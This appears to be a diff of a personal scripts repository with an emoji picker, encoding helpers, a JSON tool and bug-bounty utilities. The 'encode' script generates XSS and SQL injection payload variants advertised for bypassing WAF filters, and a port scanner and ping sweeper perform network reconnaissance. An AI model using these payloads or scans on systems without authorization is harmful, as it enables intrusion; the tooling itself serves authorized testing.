🏌️ person golfing golf sport
|
||||||
|
🏌️♂️ man golfing golf
|
||||||
|
🏌️♀️ woman golfing golf
|
||||||
|
🏄 person surfing surf wave beach
|
||||||
|
🏄♂️ man surfing surf wave
|
||||||
|
🏄♀️ woman surfing surf wave
|
||||||
|
🚣 person rowing boat row water
|
||||||
|
🚣♂️ man rowing boat row
|
||||||
|
🚣♀️ woman rowing boat row
|
||||||
|
🏊 person swimming swim pool water
|
||||||
|
🏊♂️ man swimming swim
|
||||||
|
🏊♀️ woman swimming swim
|
||||||
|
⛹️ person bouncing ball basketball sport
|
||||||
|
⛹️♂️ man bouncing ball basketball
|
||||||
|
⛹️♀️ woman bouncing ball basketball
|
||||||
|
🏋️ person lifting weights gym workout exercise
|
||||||
|
🏋️♂️ man lifting weights gym
|
||||||
|
🏋️♀️ woman lifting weights gym
|
||||||
|
🚴 person biking bike bicycle cycling
|
||||||
|
🚴♂️ man biking bike bicycle
|
||||||
|
🚴♀️ woman biking bike bicycle
|
||||||
|
🚵 person mountain biking bike trail
|
||||||
|
🚵♂️ man mountain biking bike
|
||||||
|
🚵♀️ woman mountain biking bike
|
||||||
|
🤸 person cartwheeling gymnastics cartwheel
|
||||||
|
🤸♂️ man cartwheeling gymnastics
|
||||||
|
🤸♀️ woman cartwheeling gymnastics
|
||||||
|
🤼 people wrestling wrestle sport
|
||||||
|
🤼♂️ men wrestling wrestle
|
||||||
|
🤼♀️ women wrestling wrestle
|
||||||
|
🤽 person playing water polo water sport
|
||||||
|
🤽♂️ man playing water polo
|
||||||
|
🤽♀️ woman playing water polo
|
||||||
|
🤾 person playing handball handball sport
|
||||||
|
🤾♂️ man playing handball
|
||||||
|
🤾♀️ woman playing handball
|
||||||
|
🤹 person juggling juggle circus performance
|
||||||
|
🤹♂️ man juggling juggle
|
||||||
|
🤹♀️ woman juggling juggle
|
||||||
|
🧘 person lotus position yoga meditation zen
|
||||||
|
🧘♂️ man lotus position yoga
|
||||||
|
🧘♀️ woman lotus position yoga
|
||||||
|
🛀 person taking bath bathtub shower relaxing
|
||||||
|
🛌 person bed sleeping rest sleep
|
||||||
|
🧑🤝🧑 people holding hands friends together couple
|
||||||
|
👭 women holding hands friends together couple
|
||||||
|
👫 woman man holding hands couple together
|
||||||
|
👬 men holding hands friends together couple
|
||||||
|
💏 kiss couple love romance kissing
|
||||||
|
👩❤️💋👨 kiss woman man couple love
|
||||||
|
👨❤️💋👨 kiss man man couple love gay
|
||||||
|
👩❤️💋👩 kiss woman woman couple love lesbian
|
||||||
|
💑 couple heart love together romance
|
||||||
|
👩❤️👨 couple heart woman man love
|
||||||
|
👨❤️👨 couple heart man man love gay
|
||||||
|
👩❤️👩 couple heart woman woman love lesbian
|
||||||
|
👨👩👦 family man woman boy parents child
|
||||||
|
👨👩👧 family man woman girl parents child
|
||||||
|
👨👩👧👦 family man woman girl boy parents children
|
||||||
|
👨👩👦👦 family man woman boy boy parents children
|
||||||
|
👨👩👧👧 family man woman girl girl parents children
|
||||||
|
👨👨👦 family man man boy gay parents
|
||||||
|
👨👨👧 family man man girl gay parents
|
||||||
|
👨👨👧👦 family man man girl boy gay parents
|
||||||
|
👨👨👦👦 family man man boy boy gay parents
|
||||||
|
👨👨👧👧 family man man girl girl gay parents
|
||||||
|
👩👩👦 family woman woman boy lesbian parents
|
||||||
|
👩👩👧 family woman woman girl lesbian parents
|
||||||
|
👩👩👧👦 family woman woman girl boy lesbian parents
|
||||||
|
👩👩👦👦 family woman woman boy boy lesbian parents
|
||||||
|
👩👩👧👧 family woman woman girl girl lesbian parents
|
||||||
|
👨👦 family man boy father son parent
|
||||||
|
👨👦👦 family man boy boy father sons
|
||||||
|
👨👧 family man girl father daughter
|
||||||
|
👨👧👦 family man girl boy father children
|
||||||
|
👨👧👧 family man girl girl father daughters
|
||||||
|
👩👦 family woman boy mother son parent
|
||||||
|
👩👦👦 family woman boy boy mother sons
|
||||||
|
👩👧 family woman girl mother daughter
|
||||||
|
👩👧👦 family woman girl boy mother children
|
||||||
|
👩👧👧 family woman girl girl mother daughters
|
||||||
|
🗣️ speaking head talking voice sound speaking
|
||||||
|
👤 bust silhouette profile person user
|
||||||
|
👥 busts silhouette people users group crowd
|
||||||
|
🫂 people hugging hug embrace support comfort
|
||||||
|
👣 footprints feet steps walking tracks"
|
||||||
|
|
||||||
|
if command -v fzf &>/dev/null; then
|
||||||
|
# Interactive mode with fzf
|
||||||
|
if [[ $# -eq 0 ]]; then
|
||||||
|
selected=$(echo "$emojis" | fzf --height=60% --layout=reverse \
|
||||||
|
--prompt="Select emoji: " \
|
||||||
|
--preview='echo {}' \
|
||||||
|
--preview-window=up:1:wrap)
|
||||||
|
if [[ -n "$selected" ]]; then
|
||||||
|
emoji_char=$(echo "$selected" | awk '{print $1}')
|
||||||
|
echo -n "$emoji_char" | pbcopy
|
||||||
|
echo "Copied: $emoji_char"
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
# Search mode
|
||||||
|
echo "$emojis" | grep -i "$@" | head -20
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
# Fallback without fzf - just search
|
||||||
|
if [[ $# -eq 0 ]]; then
|
||||||
|
echo "$emojis"
|
||||||
|
else
|
||||||
|
echo "$emojis" | grep -i "$@"
|
||||||
|
fi
|
||||||
|
fi
|
||||||
316
scripts/encode
Executable file
316
scripts/encode
Executable file
|
|
@ -0,0 +1,316 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: encode
|
||||||
|
# Description: Encoding/Decoding Swiss Army Knife for security testing
|
||||||
|
# Usage: encode base64 "hello" # Base64 encode
|
||||||
|
# encode base64d "aGVsbG8=" # Base64 decode
|
||||||
|
# encode url "hello world" # URL encode
|
||||||
|
# encode urld "hello%20world" # URL decode
|
||||||
|
# encode html "<script>" # HTML entity encode
|
||||||
|
# encode htmld "<script>" # HTML entity decode
|
||||||
|
# encode hex "hello" # Hex encode
|
||||||
|
# encode hexd "68656c6c6f" # Hex decode
|
||||||
|
# encode jwt <token> # Decode JWT
|
||||||
|
# encode hash md5 "password" # Generate hash
|
||||||
|
# pbpaste | encode base64 # Pipe from clipboard
|
||||||
|
# encode xss "<script>" # Multiple XSS encodings
|
||||||
|
|
||||||
|
VERSION="1.0.0"
|
||||||
|
|
||||||
|
# Colors
|
||||||
|
readonly RED='\033[0;31m'
|
||||||
|
readonly GREEN='\033[0;32m'
|
||||||
|
readonly YELLOW='\033[1;33m'
|
||||||
|
readonly BLUE='\033[0;34m'
|
||||||
|
readonly CYAN='\033[0;36m'
|
||||||
|
readonly BOLD='\033[1m'
|
||||||
|
readonly NC='\033[0m'
|
||||||
|
|
||||||
|
show_help() {
|
||||||
|
echo -e "${BOLD}encode${NC} - Encoding/Decoding Swiss Army Knife v${VERSION}"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}USAGE:${NC}"
|
||||||
|
echo " encode <operation> <input>"
|
||||||
|
echo " echo <input> | encode <operation>"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}ENCODING OPERATIONS:${NC}"
|
||||||
|
echo -e " ${CYAN}base64${NC} Base64 encode"
|
||||||
|
echo -e " ${CYAN}base64d${NC} Base64 decode"
|
||||||
|
echo -e " ${CYAN}url${NC} URL encode"
|
||||||
|
echo -e " ${CYAN}urld${NC} URL decode"
|
||||||
|
echo -e " ${CYAN}html${NC} HTML entity encode"
|
||||||
|
echo -e " ${CYAN}htmld${NC} HTML entity decode"
|
||||||
|
echo -e " ${CYAN}hex${NC} Hexadecimal encode"
|
||||||
|
echo -e " ${CYAN}hexd${NC} Hexadecimal decode"
|
||||||
|
echo -e " ${CYAN}unicode${NC} Unicode escape sequences (\\uXXXX)"
|
||||||
|
echo -e " ${CYAN}unicoded${NC} Unicode unescape"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}HASH OPERATIONS:${NC}"
|
||||||
|
echo -e " ${CYAN}hash md5${NC} MD5 hash"
|
||||||
|
echo -e " ${CYAN}hash sha1${NC} SHA1 hash"
|
||||||
|
echo -e " ${CYAN}hash sha256${NC} SHA256 hash"
|
||||||
|
echo -e " ${CYAN}hash sha512${NC} SHA512 hash"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}SECURITY OPERATIONS:${NC}"
|
||||||
|
echo -e " ${CYAN}jwt${NC} Decode JWT token (no verification)"
|
||||||
|
echo -e " ${CYAN}xss${NC} Generate XSS payload variants"
|
||||||
|
echo -e " ${CYAN}sqli${NC} Generate SQL injection variants"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||||
|
echo " encode base64 \"hello world\""
|
||||||
|
echo " echo \"test\" | encode url"
|
||||||
|
echo " pbpaste | encode base64 | pbcopy"
|
||||||
|
echo " encode jwt eyJhbGc..."
|
||||||
|
echo " encode hash sha256 \"password\""
|
||||||
|
echo " encode xss \"<script>alert(1)</script>\""
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}SECURITY NOTE:${NC}"
|
||||||
|
echo " This tool is for authorized security testing and educational purposes only."
|
||||||
|
}
|
||||||
|
|
||||||
|
# Read input from argument or stdin
|
||||||
|
get_input() {
|
||||||
|
if [[ $# -gt 0 ]]; then
|
||||||
|
echo "$*"
|
||||||
|
else
|
||||||
|
cat
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Base64 operations
|
||||||
|
base64_encode() {
|
||||||
|
local input=$(get_input "$@")
|
||||||
|
echo -n "$input" | base64 -w 0 2>/dev/null || echo -n "$input" | base64
|
||||||
|
}
|
||||||
|
|
||||||
|
base64_decode() {
|
||||||
|
local input=$(get_input "$@")
|
||||||
|
echo -n "$input" | base64 -d 2>/dev/null || echo -n "$input" | base64 -D
|
||||||
|
}
|
||||||
|
|
||||||
|
# URL operations
|
||||||
|
url_encode() {
|
||||||
|
local input=$(get_input "$@")
|
||||||
|
python3 -c "import urllib.parse; print(urllib.parse.quote('$input'))"
|
||||||
|
}
|
||||||
|
|
||||||
|
url_decode() {
|
||||||
|
local input=$(get_input "$@")
|
||||||
|
python3 -c "import urllib.parse; print(urllib.parse.unquote('$input'))"
|
||||||
|
}
|
||||||
|
|
||||||
|
# HTML operations
|
||||||
|
html_encode() {
|
||||||
|
local input=$(get_input "$@")
|
||||||
|
python3 -c "import html; print(html.escape('$input'))"
|
||||||
|
}
|
||||||
|
|
||||||
|
html_decode() {
|
||||||
|
local input=$(get_input "$@")
|
||||||
|
python3 -c "import html; print(html.unescape('$input'))"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Hex operations
|
||||||
|
hex_encode() {
|
||||||
|
local input=$(get_input "$@")
|
||||||
|
echo -n "$input" | xxd -p | tr -d '\n'
|
||||||
|
}
|
||||||
|
|
||||||
|
hex_decode() {
|
||||||
|
local input=$(get_input "$@")
|
||||||
|
echo -n "$input" | xxd -r -p
|
||||||
|
}
|
||||||
|
|
||||||
|
# Unicode operations
|
||||||
|
unicode_encode() {
|
||||||
|
local input=$(get_input "$@")
|
||||||
|
python3 << EOF
|
||||||
|
import sys
|
||||||
|
text = "$input"
|
||||||
|
result = ''.join(f'\\u{ord(c):04x}' for c in text)
|
||||||
|
print(result)
|
||||||
|
EOF
|
||||||
|
}
|
||||||
|
|
||||||
|
unicode_decode() {
|
||||||
|
local input=$(get_input "$@")
|
||||||
|
python3 -c "print('$input'.encode().decode('unicode_escape'))"
|
||||||
|
}
|
||||||
|
|
||||||
|
# JWT decode
|
||||||
|
jwt_decode() {
|
||||||
|
local token=$(get_input "$@")
|
||||||
|
|
||||||
|
# Split JWT into parts
|
||||||
|
IFS='.' read -ra PARTS <<< "$token"
|
||||||
|
|
||||||
|
if [[ ${#PARTS[@]} -ne 3 ]]; then
|
||||||
|
echo "${RED}Error: Invalid JWT format${NC}" >&2
|
||||||
|
return 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -e "${BOLD}${CYAN}=== JWT Header ===${NC}"
|
||||||
|
echo "${PARTS[0]}" | base64_decode | python3 -m json.tool
|
||||||
|
|
||||||
|
echo -e "\n${BOLD}${CYAN}=== JWT Payload ===${NC}"
|
||||||
|
echo "${PARTS[1]}" | base64_decode | python3 -m json.tool
|
||||||
|
|
||||||
|
echo -e "\n${BOLD}${YELLOW}Note: Signature not verified${NC}"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Hash generation
|
||||||
|
generate_hash() {
|
||||||
|
local algo=$1
|
||||||
|
shift
|
||||||
|
local input=$(get_input "$@")
|
||||||
|
|
||||||
|
case "$algo" in
|
||||||
|
md5)
|
||||||
|
echo -n "$input" | md5sum | awk '{print $1}'
|
||||||
|
;;
|
||||||
|
sha1)
|
||||||
|
echo -n "$input" | sha1sum | awk '{print $1}'
|
||||||
|
;;
|
||||||
|
sha256)
|
||||||
|
echo -n "$input" | sha256sum | awk '{print $1}'
|
||||||
|
;;
|
||||||
|
sha512)
|
||||||
|
echo -n "$input" | sha512sum | awk '{print $1}'
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
echo "${RED}Error: Unknown hash algorithm: $algo${NC}" >&2
|
||||||
|
echo "Available: md5, sha1, sha256, sha512" >&2
|
||||||
|
return 1
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
}
|
||||||
|
|
||||||
|
# XSS payload variants
|
||||||
|
xss_variants() {
|
||||||
|
local input=$(get_input "$@")
|
||||||
|
|
||||||
|
echo -e "${BOLD}${CYAN}=== XSS Payload Variants ===${NC}\n"
|
||||||
|
|
||||||
|
echo -e "${YELLOW}[Original]${NC}"
|
||||||
|
echo "$input"
|
||||||
|
|
||||||
|
echo -e "\n${YELLOW}[URL Encoded]${NC}"
|
||||||
|
url_encode "$input"
|
||||||
|
|
||||||
|
echo -e "\n${YELLOW}[Double URL Encoded]${NC}"
|
||||||
|
url_encode "$(url_encode "$input")"
|
||||||
|
|
||||||
|
echo -e "\n${YELLOW}[HTML Entity Encoded]${NC}"
|
||||||
|
html_encode "$input"
|
||||||
|
|
||||||
|
echo -e "\n${YELLOW}[Hex Encoded]${NC}"
|
||||||
|
hex_encode "$input"
|
||||||
|
|
||||||
|
echo -e "\n${YELLOW}[Base64]${NC}"
|
||||||
|
base64_encode "$input"
|
||||||
|
|
||||||
|
echo -e "\n${YELLOW}[Unicode Escaped]${NC}"
|
||||||
|
unicode_encode "$input"
|
||||||
|
|
||||||
|
echo -e "\n${BOLD}${GREEN}Tip: Use these to bypass WAF filters${NC}"
|
||||||
|
}
|
||||||
|
|
||||||
|
# SQL injection variants
|
||||||
|
sqli_variants() {
|
||||||
|
local input=$(get_input "$@")
|
||||||
|
|
||||||
|
echo -e "${BOLD}${CYAN}=== SQL Injection Variants ===${NC}\n"
|
||||||
|
|
||||||
|
echo -e "${YELLOW}[Original]${NC}"
|
||||||
|
echo "$input"
|
||||||
|
|
||||||
|
echo -e "\n${YELLOW}[URL Encoded]${NC}"
|
||||||
|
url_encode "$input"
|
||||||
|
|
||||||
|
echo -e "\n${YELLOW}[Double URL Encoded]${NC}"
|
||||||
|
url_encode "$(url_encode "$input")"
|
||||||
|
|
||||||
|
echo -e "\n${YELLOW}[Uppercase]${NC}"
|
||||||
|
echo "$input" | tr '[:lower:]' '[:upper:]'
|
||||||
|
|
||||||
|
echo -e "\n${YELLOW}[Mixed Case]${NC}"
|
||||||
|
python3 << EOF
|
||||||
|
import random
|
||||||
|
text = "$input"
|
||||||
|
result = ''.join(c.upper() if random.random() > 0.5 else c.lower() for c in text)
|
||||||
|
print(result)
|
||||||
|
EOF
|
||||||
|
|
||||||
|
echo -e "\n${YELLOW}[With Comments]${NC}"
|
||||||
|
echo "$input" | sed 's/ /\/**\/ /g'
|
||||||
|
|
||||||
|
echo -e "\n${BOLD}${GREEN}Tip: Combine with timing to test blind SQLi${NC}"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Main logic
|
||||||
|
if [[ $# -eq 0 ]]; then
|
||||||
|
show_help
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
operation=$1
|
||||||
|
shift
|
||||||
|
|
||||||
|
case "$operation" in
|
||||||
|
-h|--help|help)
|
||||||
|
show_help
|
||||||
|
;;
|
||||||
|
base64|b64)
|
||||||
|
base64_encode "$@"
|
||||||
|
;;
|
||||||
|
base64d|b64d)
|
||||||
|
base64_decode "$@"
|
||||||
|
;;
|
||||||
|
url)
|
||||||
|
url_encode "$@"
|
||||||
|
;;
|
||||||
|
urld)
|
||||||
|
url_decode "$@"
|
||||||
|
;;
|
||||||
|
html)
|
||||||
|
html_encode "$@"
|
||||||
|
;;
|
||||||
|
htmld)
|
||||||
|
html_decode "$@"
|
||||||
|
;;
|
||||||
|
hex)
|
||||||
|
hex_encode "$@"
|
||||||
|
;;
|
||||||
|
hexd)
|
||||||
|
hex_decode "$@"
|
||||||
|
;;
|
||||||
|
unicode|uni)
|
||||||
|
unicode_encode "$@"
|
||||||
|
;;
|
||||||
|
unicoded|unid)
|
||||||
|
unicode_decode "$@"
|
||||||
|
;;
|
||||||
|
jwt)
|
||||||
|
jwt_decode "$@"
|
||||||
|
;;
|
||||||
|
hash)
|
||||||
|
if [[ $# -eq 0 ]]; then
|
||||||
|
echo "${RED}Error: Hash algorithm required${NC}" >&2
|
||||||
|
echo "Usage: encode hash <md5|sha1|sha256|sha512> <input>" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
generate_hash "$@"
|
||||||
|
;;
|
||||||
|
xss)
|
||||||
|
xss_variants "$@"
|
||||||
|
;;
|
||||||
|
sqli|sql)
|
||||||
|
sqli_variants "$@"
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
echo "${RED}Error: Unknown operation: $operation${NC}" >&2
|
||||||
|
echo "Run 'encode --help' for usage information" >&2
|
||||||
|
exit 1
|
||||||
|
;;
|
||||||
|
esac
|
||||||
93
scripts/fast-portscan.py
Executable file
93
scripts/fast-portscan.py
Executable file
|
|
@ -0,0 +1,93 @@
|
||||||
|
#!/usr/bin/python3
|
||||||
|
|
||||||
|
import socket
|
||||||
|
import common_ports
|
||||||
|
import os
|
||||||
|
import sys
|
||||||
|
import re
|
||||||
|
from concurrent.futures import ThreadPoolExecutor
|
||||||
|
|
||||||
|
|
||||||
|
def scan_port(ip_addr, port):
|
||||||
|
try:
|
||||||
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||||
|
s.settimeout(1)
|
||||||
|
result = s.connect_ex((ip_addr, port))
|
||||||
|
s.close()
|
||||||
|
if result == 0:
|
||||||
|
return port
|
||||||
|
except:
|
||||||
|
return None
|
||||||
|
return None
|
||||||
|
|
||||||
|
|
||||||
|
def get_open_ports(target, port_range, verbose=False):
|
||||||
|
open_ports = []
|
||||||
|
|
||||||
|
# Try resolving the target
|
||||||
|
try:
|
||||||
|
ip_addr = socket.gethostbyname(target)
|
||||||
|
except socket.gaierror:
|
||||||
|
if re.match(r'^\d{1,3}(\.\d{1,3}){3}$', target):
|
||||||
|
return "Error: Invalid IP address"
|
||||||
|
else:
|
||||||
|
return "Error: Invalid hostname"
|
||||||
|
|
||||||
|
# Build the list of ports from range
|
||||||
|
ports_list = list(range(port_range[0], port_range[1] + 1))
|
||||||
|
|
||||||
|
with ThreadPoolExecutor(max_workers=100) as executor:
|
||||||
|
futures = [executor.submit(scan_port, ip_addr, port) for port in ports_list]
|
||||||
|
for future in futures:
|
||||||
|
result = future.result()
|
||||||
|
if result:
|
||||||
|
open_ports.append(result)
|
||||||
|
|
||||||
|
# Output
|
||||||
|
if verbose:
|
||||||
|
try:
|
||||||
|
hostname = socket.gethostbyaddr(ip_addr)[0]
|
||||||
|
except socket.herror:
|
||||||
|
hostname = target
|
||||||
|
|
||||||
|
output = f"Open ports for {hostname} ({ip_addr})\nPORT SERVICE\n"
|
||||||
|
try:
|
||||||
|
import common_ports
|
||||||
|
for port in open_ports:
|
||||||
|
service = common_ports.ports_and_services.get(port, 'unknown')
|
||||||
|
output += f"{port:<9}{service}\n"
|
||||||
|
except ImportError:
|
||||||
|
for port in open_ports:
|
||||||
|
output += f"{port:<9}unknown\n"
|
||||||
|
return output.strip()
|
||||||
|
|
||||||
|
return open_ports
|
||||||
|
|
||||||
|
|
||||||
|
# print(get_open_ports("scanme.nmap.org", [20, 80], verbose=True))
|
||||||
|
|
||||||
|
def main():
|
||||||
|
if len(sys.argv) < 2:
|
||||||
|
print("Usage: python3 portscan.py <ip_or_file> [start_port] [end_port] [--verbose]")
|
||||||
|
return
|
||||||
|
|
||||||
|
input_arg = sys.argv[1]
|
||||||
|
start_port = int(sys.argv[2]) if len(sys.argv) > 2 else 20
|
||||||
|
end_port = int(sys.argv[3]) if len(sys.argv) > 3 else 1024
|
||||||
|
verbose = "--verbose" in sys.argv
|
||||||
|
|
||||||
|
targets = []
|
||||||
|
|
||||||
|
if os.path.isfile(input_arg):
|
||||||
|
with open(input_arg) as f:
|
||||||
|
targets = [line.strip() for line in f if line.strip()]
|
||||||
|
else:
|
||||||
|
targets = [input_arg]
|
||||||
|
|
||||||
|
for target in targets:
|
||||||
|
print(get_open_ports(target, [start_port, end_port], verbose))
|
||||||
|
print("-" * 40)
|
||||||
|
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
main()
|
||||||
53
scripts/fast-psweep.py
Executable file
53
scripts/fast-psweep.py
Executable file
|
|
@ -0,0 +1,53 @@
|
||||||
|
import sys
|
||||||
|
import subprocess
|
||||||
|
import time
|
||||||
|
from concurrent.futures import ThreadPoolExecutor, as_completed
|
||||||
|
|
||||||
|
|
||||||
|
def ping_host(ip):
|
||||||
|
result = subprocess.run(
|
||||||
|
["ping", "-c", "1", "-W", "1", ip],
|
||||||
|
stdout=subprocess.DEVNULL
|
||||||
|
)
|
||||||
|
return ip if result.returncode == 0 else None
|
||||||
|
|
||||||
|
|
||||||
|
def ping_sweep(network_prefix, max_threads=100):
|
||||||
|
live_hosts = []
|
||||||
|
|
||||||
|
with ThreadPoolExecutor(max_workers=max_threads) as executor:
|
||||||
|
futures = [executor.submit(ping_host, f"{network_prefix}.{i}") for i in range(1, 256)]
|
||||||
|
|
||||||
|
for future in as_completed(futures):
|
||||||
|
result = future.result()
|
||||||
|
if result:
|
||||||
|
print(f"{result} is up.")
|
||||||
|
live_hosts.append(result)
|
||||||
|
|
||||||
|
return live_hosts
|
||||||
|
|
||||||
|
|
||||||
|
# ---- Entry Point ----
|
||||||
|
if __name__ == "__main__":
|
||||||
|
if len(sys.argv) < 2:
|
||||||
|
print("Usage: python3 pingsweep.py <network_prefix>")
|
||||||
|
print("Example: python3 pingsweep.py 192.168.1")
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
# Assume prefix like "192.168.1"
|
||||||
|
prefix = sys.argv[1]
|
||||||
|
timestamp = time.strftime('%Y%m%d-%H%M%S')
|
||||||
|
filename = f'{prefix}.0_24_{timestamp}.txt'
|
||||||
|
|
||||||
|
print(f"Scanning {prefix}.1 to {prefix}.255 ...")
|
||||||
|
hosts = ping_sweep(prefix)
|
||||||
|
|
||||||
|
print("\nLive hosts:")
|
||||||
|
for host in hosts:
|
||||||
|
print(host)
|
||||||
|
|
||||||
|
with open(filename, 'w') as f:
|
||||||
|
for host in hosts:
|
||||||
|
f.write(host + '\n')
|
||||||
|
|
||||||
|
print(f'Saved live hosts to {filename}')
|
||||||
14
scripts/flameshot-bb
Executable file
14
scripts/flameshot-bb
Executable file
|
|
@ -0,0 +1,14 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
TEMP="/tmp/flameshot_$(date +%s).png"
|
||||||
|
flameshot gui -p "$TEMP"
|
||||||
|
if [[ -f "$TEMP" ]]; then
|
||||||
|
convert "$TEMP" \
|
||||||
|
-bordercolor '#DC143C' -border 3 \
|
||||||
|
-bordercolor white -border 12 \
|
||||||
|
-bordercolor '#333333' -border 1 \
|
||||||
|
\( +clone -background black -shadow 80x5+8+8 \) \
|
||||||
|
+swap -background white -layers merge +repage \
|
||||||
|
~/Pictures/Screenshots/bb_$(date +%Y%m%d_%H%M%S).png
|
||||||
|
rm "$TEMP"
|
||||||
|
fi
|
||||||
28
scripts/flameshot-bb-edit
Executable file
28
scripts/flameshot-bb-edit
Executable file
|
|
@ -0,0 +1,28 @@
|
||||||
|
#!/bin/bash
|
||||||
|
# Bug Bounty Documentation Screenshot: Annotate -> Add border -> Save
|
||||||
|
# Usage: Bound to Shift+Super+D
|
||||||
|
|
||||||
|
TEMP="/tmp/flameshot_$(date +%s).png"
|
||||||
|
|
||||||
|
# This will open Flameshot GUI with all annotation tools available
|
||||||
|
flameshot gui -p "$TEMP"
|
||||||
|
|
||||||
|
if [[ -f "$TEMP" ]]; then
|
||||||
|
# Add professional border
|
||||||
|
convert "$TEMP" \
|
||||||
|
-bordercolor '#DC143C' -border 3 \
|
||||||
|
-bordercolor white -border 12 \
|
||||||
|
-bordercolor '#333333' -border 1 \
|
||||||
|
\( +clone -background black -shadow 80x5+8+8 \) \
|
||||||
|
+swap -background white -layers merge +repage \
|
||||||
|
~/Pictures/Screenshots/bb_doc_$(date +%Y%m%d_%H%M%S).png
|
||||||
|
|
||||||
|
rm "$TEMP"
|
||||||
|
|
||||||
|
# Copy relative path to clipboard
|
||||||
|
LATEST=$(ls -t ~/Pictures/Screenshots/bb_doc_*.png 2>/dev/null | head -1)
|
||||||
|
if [[ -n "$LATEST" ]]; then
|
||||||
|
echo "Screenshots/$(basename "$LATEST")" | xclip -selection clipboard 2>/dev/null || true
|
||||||
|
notify-send "Bug Bounty Screenshot" "Saved: $(basename "$LATEST")" 2>/dev/null || true
|
||||||
|
fi
|
||||||
|
fi
|
||||||
75
scripts/httpstatus
Executable file
75
scripts/httpstatus
Executable file
|
|
@ -0,0 +1,75 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: httpstatus
|
||||||
|
# Description: HTTP status code reference lookup
|
||||||
|
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||||
|
# Usage: httpstatus # show all
|
||||||
|
# httpstatus 404 # search for 404
|
||||||
|
# httpstatus server # search for "server"
|
||||||
|
|
||||||
|
statuses="100 Continue
|
||||||
|
101 Switching Protocols
|
||||||
|
102 Processing
|
||||||
|
200 OK
|
||||||
|
201 Created
|
||||||
|
202 Accepted
|
||||||
|
203 Non-Authoritative Information
|
||||||
|
204 No Content
|
||||||
|
205 Reset Content
|
||||||
|
206 Partial Content
|
||||||
|
207 Multi-Status
|
||||||
|
208 Already Reported
|
||||||
|
300 Multiple Choices
|
||||||
|
301 Moved Permanently
|
||||||
|
302 Found
|
||||||
|
303 See Other
|
||||||
|
304 Not Modified
|
||||||
|
305 Use Proxy
|
||||||
|
307 Temporary Redirect
|
||||||
|
400 Bad Request
|
||||||
|
401 Unauthorized
|
||||||
|
402 Payment Required
|
||||||
|
403 Forbidden
|
||||||
|
404 Not Found
|
||||||
|
405 Method Not Allowed
|
||||||
|
406 Not Acceptable
|
||||||
|
407 Proxy Authentication Required
|
||||||
|
408 Request Timeout
|
||||||
|
409 Conflict
|
||||||
|
410 Gone
|
||||||
|
411 Length Required
|
||||||
|
412 Precondition Failed
|
||||||
|
413 Request Entity Too Large
|
||||||
|
414 Request-URI Too Large
|
||||||
|
415 Unsupported Media Type
|
||||||
|
416 Request Range Not Satisfiable
|
||||||
|
417 Expectation Failed
|
||||||
|
418 I'm a teapot
|
||||||
|
420 Blaze it
|
||||||
|
422 Unprocessable Entity
|
||||||
|
423 Locked
|
||||||
|
424 Failed Dependency
|
||||||
|
425 No code
|
||||||
|
426 Upgrade Required
|
||||||
|
428 Precondition Required
|
||||||
|
429 Too Many Requests
|
||||||
|
431 Request Header Fields Too Large
|
||||||
|
449 Retry with
|
||||||
|
500 Internal Server Error
|
||||||
|
501 Not Implemented
|
||||||
|
502 Bad Gateway
|
||||||
|
503 Service Unavailable
|
||||||
|
504 Gateway Timeout
|
||||||
|
505 HTTP Version Not Supported
|
||||||
|
506 Variant Also Negotiates
|
||||||
|
507 Insufficient Storage
|
||||||
|
509 Bandwidth Limit Exceeded
|
||||||
|
510 Not Extended
|
||||||
|
511 Network Authentication Required"
|
||||||
|
|
||||||
|
if [[ $# -eq 0 ]]; then
|
||||||
|
echo "$statuses"
|
||||||
|
else
|
||||||
|
echo "$statuses" | grep -i --color=never "$@"
|
||||||
|
fi
|
||||||
219
scripts/jj
Executable file
219
scripts/jj
Executable file
|
|
@ -0,0 +1,219 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: jj
|
||||||
|
# Description: JSON formatting and querying tool (upgrade from alias)
|
||||||
|
# Usage: jj # Format clipboard JSON
|
||||||
|
# jj '.users[0].name' # jq query on clipboard
|
||||||
|
# jj -v # Validate JSON
|
||||||
|
# jj -f file.json # Format file in place
|
||||||
|
# jj -c # Compact JSON (remove whitespace)
|
||||||
|
# cat file.json | jj # Format from stdin
|
||||||
|
|
||||||
|
VERSION="1.0.0"
|
||||||
|
|
||||||
|
show_help() {
|
||||||
|
echo -e "\033[1mjj\033[0m - JSON Formatting & Querying Tool v${VERSION}"
|
||||||
|
echo
|
||||||
|
echo -e "\033[1mUSAGE:\033[0m"
|
||||||
|
echo " jj [OPTIONS] [JQ_QUERY]"
|
||||||
|
echo
|
||||||
|
echo -e "\033[1mOPTIONS:\033[0m"
|
||||||
|
echo -e " \033[0;36m-v, --validate\033[0m Validate JSON only (no output)"
|
||||||
|
echo -e " \033[0;36m-f, --file\033[0m Format file in place"
|
||||||
|
